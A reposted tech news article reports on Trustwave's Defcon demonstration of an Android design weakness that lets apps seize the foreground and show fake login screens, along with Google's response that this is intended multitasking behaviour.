A design weakness in Google's Android mobile OS could make it easy for criminals to launch phishing attacks to steal passwords, researchers said.
According to security firm Trustwave, the flaw allows app developers to create fake login pages while the user is on a banking site.
It said the weakness stemmed from the ability to push one application to the front of active processes, rather than use a notification bar alert. The design could also lead to advertising pop-ups, Trustwave said.
"Because of that, the app is able to steal the focus and you're not able to hit the back button to exit out," Nicholas Percoco, senior vice president and head of SpiderLabs at Trustwave, told CNet.
Trustwave, as part of a presentation at the Defcon hacking conference, showed off a proof of concept that targeted Facebook, Amazon and Google passwords, with the fake screen replacing the original, which could catch users off guard.
Google said the app issue wasn't a flaw at all, but a part of Android's multitasking capabilities, although Trustwave claimed the company said it was looking into the issue.
"Switching between applications is a desired capability used by many applications to encourage rich interaction between applications,” Google said in a statement sent to CNet.
“We haven't seen any apps maliciously using this technique on Android Market and we will remove any apps that do."
However, Trustwave said waiting for an app to be reported before removing it was a “dangerous” stance.
This article originally appeared at pcpro.co.uk
Copyright © PC Pro, Dennis Publishing
Issue: 316 | July 2013
Access CRN's extensive online resources including; email bulletins, community discussions and unique online news.
Processing registration... Please wait.
This process can take up to a minute to complete.
A confirmation email has been sent to your email address - SUPPLIED GOES EMAIL HERE. Please click on the link in the email to verify your email address. You need to verify your email before you can log on to the CRN website or start posting comments on articles.
If you do not receive your confirmation email within the next few minutes, it may be because the email has been captured by a junk mail filter. Please ensure you add the domain '@crn.com.au' to your white-listed senders.